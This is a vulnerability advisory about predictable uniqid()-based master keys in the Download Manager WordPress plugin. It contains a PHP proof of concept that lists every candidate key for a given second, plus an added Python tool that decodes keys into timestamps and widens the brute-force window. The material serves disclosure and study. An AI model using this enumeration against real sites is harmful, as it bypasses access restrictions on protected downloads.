WPEX-ID: 7F0742AD-6FD7-4258-9E44-D42E138789BB
History: Mar 16, 2022 - 12:00 a.m.

Download Manager < 3.2.39 - Unauthenticated brute force of files master key

Published: 2022-03-16 00:00:00
Source: wpvulndb

EPSS: 0.002 (Low), percentile 58.9%

The plugin uses PHP's uniqid() function to generate the master key (the _wpdmkey parameter) for a download. uniqid() is not a cryptographic random generator: its 13-character output is the current Unix time in seconds (8 hex digits) followed by the microsecond part (5 hex digits). Because the timestamp of the post containing the download is public, an unauthenticated attacker who knows the second in which the key was created has at most one million microsecond values to try, which is feasible with modest resources. A valid key gives direct download access regardless of the role-based restrictions or password protection set on the download.

<?php

// The full timestamp of the post containing the download (available to an unauthenticated user).
// The PoC assumes the master key was generated within the same second the post was saved.
$wordpress_data = "2022-02-03T18:50:35+00:00";
$requestTimestamp = strtotime($wordpress_data);

// Reproduce PHP's uniqid() output for a given second and microsecond value:
// 8 hex digits of Unix seconds followed by 5 hex digits of microseconds (13 characters).
function uniqidGen($seconds, $microseconds) {
    return sprintf("%08x%05x", $seconds, $microseconds);
}

// Generate all possible master keys for the given second: exactly one million candidates,
// one per microsecond value, so every value uniqid() can return in that second is covered.
for ($usec = 0; $usec <= 999999; $usec++) {
    echo uniqidGen($requestTimestamp, $usec), PHP_EOL;
}

// The download link would be something like this:
// https://example.com/download/test-download/?wpdmdl=5&_wpdmkey=6203ab5c2a704
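The following is an added example, not code from the advisory or from the plugin. It shows the other side of the weakness: a captured _wpdmkey can be decoded back into the second and microsecond at which it was generated, which confirms it is uniqid()-shaped and tells you exactly which second to enumerate. It also enumerates the candidate set for a post timestamp and lets you widen the window when the key's creation second is only approximately known. It assumes the key is the bare uniqid() result (sprintf("%08x%05x", seconds, microseconds), no prefix and no extra entropy), and uses the key from the example link above and the PoC's post timestamp as constructed sample input.

```python
from __future__ import annotations

import re
from datetime import datetime, timezone

# Added example (not the advisory's or the plugin's code). Assumption: the master key is
# exactly what PHP's uniqid() returns with no prefix and no extra entropy, i.e.
# sprintf("%08x%05x", seconds, microseconds): 13 lowercase hex characters.
UNIQID_RE = re.compile(r"^[0-9a-f]{13}$")


def uniqid_from_parts(seconds: int, microseconds: int) -> str:
    """Reproduce PHP uniqid(): 8 hex digits of Unix seconds + 5 hex digits of microseconds."""
    if not 0 <= microseconds <= 999_999:
        raise ValueError("microseconds out of range")
    return f"{seconds:08x}{microseconds:05x}"


def decode_key(key: str) -> tuple:
    """Inverse of uniqid_from_parts(): recover (seconds, microseconds) from a key."""
    if not UNIQID_RE.fullmatch(key):
        raise ValueError(f"{key!r} is not a 13-character lowercase hex uniqid")
    return int(key[:8], 16), int(key[8:], 16)


def key_creation_time(key: str) -> datetime:
    """The UTC instant at which uniqid() produced this key (the information the key leaks)."""
    seconds, microseconds = decode_key(key)
    return datetime.fromtimestamp(seconds, tz=timezone.utc).replace(microsecond=microseconds)


def candidate_keys(post_iso: str, window_seconds: int = 0):
    """Every key uniqid() could have returned within +/- window_seconds of the post timestamp.

    With window_seconds == 0 this is the one-million-key search the advisory describes:
    one candidate per microsecond value of the single second the post was saved in.
    """
    base = int(datetime.fromisoformat(post_iso).timestamp())
    for seconds in range(base - window_seconds, base + window_seconds + 1):
        for microseconds in range(1_000_000):
            yield uniqid_from_parts(seconds, microseconds)


def search_space(window_seconds: int = 0) -> int:
    """Number of candidates candidate_keys() yields for a given window."""
    return (2 * window_seconds + 1) * 1_000_000


def key_within_window(key: str, post_iso: str, window_seconds: int = 0) -> bool:
    """Would a brute force around post_iso actually contain this key?

    Returns False for keys that are not uniqid()-shaped at all, and for keys whose
    embedded second lies outside the window (e.g. a key generated days later).
    """
    try:
        seconds, _ = decode_key(key)
    except ValueError:
        return False
    base = int(datetime.fromisoformat(post_iso).timestamp())
    return abs(seconds - base) <= window_seconds


if __name__ == "__main__":
    # Constructed sample input: the key from the advisory's example link and the PoC's post time.
    sample_key = "6203ab5c2a704"
    post_time = "2022-02-03T18:50:35+00:00"
    print(sample_key, "was generated at", key_creation_time(sample_key).isoformat())
    print("candidates for one second:", search_space(0))
    print("first candidate for the PoC's post timestamp:", next(candidate_keys(post_time)))
    print("sample key within that second?", key_within_window(sample_key, post_time))
```

Decoding the example key shows it was minted on 2022-02-09 at 11:54:04.173828 UTC, several days after the PoC's post timestamp, so a search restricted to the post's second would miss it; key_within_window() makes that check explicit before you spend a million requests. A key that resists this enumeration has to come from a CSPRNG (in PHP, random_bytes()) rather than uniqid(); whether that is how version 3.2.39 fixed the issue is not stated on this page.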
